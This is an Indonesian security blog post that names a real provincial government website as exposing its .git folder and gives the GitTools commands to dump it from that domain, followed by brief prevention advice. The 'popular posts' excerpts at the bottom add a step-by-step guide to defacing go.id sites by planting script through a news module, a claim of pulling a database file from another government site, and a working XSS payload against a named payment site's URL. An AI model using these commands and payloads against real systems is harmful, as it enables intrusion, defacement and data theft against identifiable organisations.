Langsung ke konten utama

Celah Keamanan: Folder .git Disclosure di Situs Diskominfo Sultra

Celah Keamanan: Folder .git Terbuka di Situs Diskominfo Sultra

Pernah nggak sih, kamu lagi iseng cek-cek sebuah website pemerintah dan menemukan sesuatu yang nggak seharusnya bisa diakses publik? Nah, baru-baru ini ada kejadian menarik di situs Dinas Komunikasi dan Informatika Provinsi Sulawesi Tenggara (diskominfo.sultraprov.go.id), di mana folder .git mereka ternyata bisa diakses secara terbuka.

Kenapa Ini Berbahaya?

Buat yang belum tahu, folder .git itu adalah bagian dari sistem kontrol versi Git, tempat menyimpan semua riwayat perubahan kode sumber. Kalau folder ini bisa diakses publik, bisa jadi ada celah besar yang membahayakan sistem mereka. Berikut beberapa risiko yang bisa terjadi:

  1. Bocornya kode sumber website – Kalau attacker berhasil mengekstrak isi folder ini, mereka bisa mendapatkan struktur dan kode website secara keseluruhan.
  2. Informasi sensitif terungkap – Bisa jadi ada file konfigurasi yang menyimpan kredensial database, API key, atau bahkan username & password.
  3. Eksploitasi celah keamanan – Dengan melihat kode sumber, hacker bisa menemukan bug atau kerentanan yang bisa dieksploitasi lebih lanjut.

Apa yang Bisa Dilakukan dengan Folder .git Terbuka?

Salah satu cara paling efektif untuk mengeksploitasi folder .git yang terbuka adalah dengan menggunakan GitTools. GitTools adalah sekumpulan script otomatis yang dapat digunakan untuk mengekstrak dan merekonstruksi repository Git dari server yang rentan.

Langkah-langkah penggunaannya cukup sederhana:

  1. Clone GitTools dari repository resminya:

    git clone https://github.com/internetwache/GitTools.git
    
  2. Gunakan GitDumper untuk mendownload seluruh isi folder .git:

    cd GitTools/Dumper
    ./gitdumper.sh https://diskominfo.sultraprov.go.id/.git/ ./diskominfo.sultraprov.go.id

 

Deng



Dengan cara ini, seorang attacker bisa mendapatkan kode sumber website, history commit, serta kemungkinan informasi sensitif yang tersimpan di dalam repository.

Cara Mencegah Masalah Ini

Kasus seperti ini seharusnya bisa dihindari dengan langkah-langkah sederhana:

  • Hapus folder .git dari server production – Folder ini seharusnya hanya ada di lingkungan development atau lokal, bukan di server yang bisa diakses publik.

  • Gunakan konfigurasi server yang benar – Pastikan web server (Apache/Nginx) memblokir akses ke folder .git. Misalnya, kalau pakai Nginx, bisa tambahkan ini di konfigurasi:

    location /.git/ {
        deny all;
    }
    
  • Gunakan Git dengan benar – Kalau memang butuh kontrol versi di production, lebih baik gunakan private repository di GitHub, GitLab, atau Bitbucket dan pastikan tidak ada jejak folder .git di server.

Kesimpulan

Folder .git yang terbuka di website pemerintah bukan hanya kesalahan teknis biasa, tapi bisa jadi celah besar yang memungkinkan kebocoran data. Bagi pengelola website, ini harus segera diperbaiki sebelum ada yang memanfaatkannya. Bagi kita yang berkecimpung di dunia keamanan siber, ini bisa jadi contoh nyata bahwa masih banyak sistem di luar sana yang kurang aman dan butuh perhatian lebih.

Jadi, kalau nemu kasus seperti ini, lebih baik laporkan ke pihak yang berwenang sebelum disalahgunakan oleh orang yang nggak bertanggung jawab.


Punya pengalaman serupa atau mau diskusi lebih lanjut soal keamanan website? Yuk, ngobrol bareng di kolom komentar


 

Komentar

Postingan populer dari blog ini

DEFACE POC REGMEN WITH JSO

Yaaa Gosh banyak bacot lgsg ke intinya ya asw Bahan²: 1.dork -inurl /kontributor site go.id  (User your brain klw punya) 2.sc jso(klw belum punya buat lah anj) 3.paket/WiFi anak org Lgsg ke setp by step 1.pertama Tama kalian nge dork dulu pilih salah satu yg kalian mau 2.isi asal asal aee form nya Trus konfirmasi 3.nanti otomatis lgsg masuk ke dashboard,nah kalian pilih titik 3 disudut kiri,tekan modul berita,trus pilih berita kek gambar di atas 4.klik tambah kan data trus isi terserah kalian, kecuali di isi berita kalian tempel SC jso kalian  kek gambar di atas Trus kalian tambahkan aja 5.trus tinggal akses hasil nya,cara nya SITE.COM/BERITA kalian tinggal klik aja punya kalian dan... bisa kan Ezy anak esde juga bisa 

Kerentanan pada sigap.b4t.go.id?

Apa sih sebenarnya sigap.b4t.go.id? Sigap (sigap.b4t.go.id) adalah sebuah website yang milik Balai Besar Bahan dan Barang Teknik (B4T), suatu badan yang dipimpin oleh yayasan Kementerian Perindustrian Indonesia. Website ini diperkirakan bertindak sebagai sistem informasi dalam, pengelolaan data, atau layanan berbasis web lainnya yang berhubungan dengan pekerjaan pokok B4T. Jenis Kerentanan Salah satu kekurangannya yang ditemukan pada sigap.b4t.go.id adalah terdapat folder.git yang dapat diakses oleh publik. Folder.git ini adalah direktori yang berisikan riwayat versi kode sumber di sistem kontrol versi Git. Jika direktori ini dibuka secara total, data yang di dalamnya dapat dieksploitasi lebih lanjut.   Setelah melakukan aplikasi kelemahan ini, saya dapat memperoleh list komplit direktori jalur semua file yang ada pada server. Informasi ini memberikan gambaran tentang struktur sistem yang diberlakukan oleh platform ini. Serta, saya dapat memperoleh file database dengan nama...

Analisis Keamanan: Kerentanan pada Astrapay

  Apa Itu Astrapay? Astrapay adalah layanan dompet digital yang dikembangkan oleh PT Astra Digital Arta. Platform ini memungkinkan pengguna untuk melakukan transaksi digital seperti pembayaran tagihan, pembelian pulsa, dan berbagai layanan keuangan lainnya dengan mudah dan cepat. Sebagai bagian dari ekosistem Astra, Astrapay bertujuan untuk memberikan solusi pembayaran yang aman dan nyaman bagi penggunanya. Kerentanan yang Ditemukan Pada halaman legal Astrapay ( https://astrapay.com/legal ), terdapat potensi kerentanan terkait dengan unsanitized input dalam parameter product . Salah satu contoh eksploitasi adalah dengan memasukkan payload berikut: https://astrapay.com/legal?product="><Svg On Only=1 Onload=alert("FAREL")>%0A Kerentanan ini menunjukkan adanya Cross-Site Scripting (XSS) Reflected , di mana input pengguna tidak difilter dengan baik sebelum ditampilkan di halaman web. Jika dieksekusi di browser, skrip dalam parameter tersebut dapat menyebabkan ek...